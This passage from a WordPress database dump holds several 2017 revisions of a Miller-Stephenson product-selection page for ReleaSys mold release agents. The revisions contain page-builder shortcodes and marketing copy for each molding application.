fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:14:55', '2017-06-08 18:14:55', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4520, 2, '2017-06-08 18:16:54', '2017-06-08 18:16:54', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER"]\r\n\r\n[button text="INJECTION PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n<p><a name="polyurethane"></a></p>\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:16:54', '2017-06-08 18:16:54', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4521, 2, '2017-06-08 18:17:33', '2017-06-08 18:17:33', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER"]\r\n\r\n[button text="INJECTION PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n<p><a name="polyurethane"></a></p>\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:17:33', '2017-06-08 18:17:33', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4522, 2, '2017-06-08 18:18:14', '2017-06-08 18:18:14', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER"]\r\n\r\n[button text="INJECTION PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n<p><a name="polyurethane"></a></p>\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold 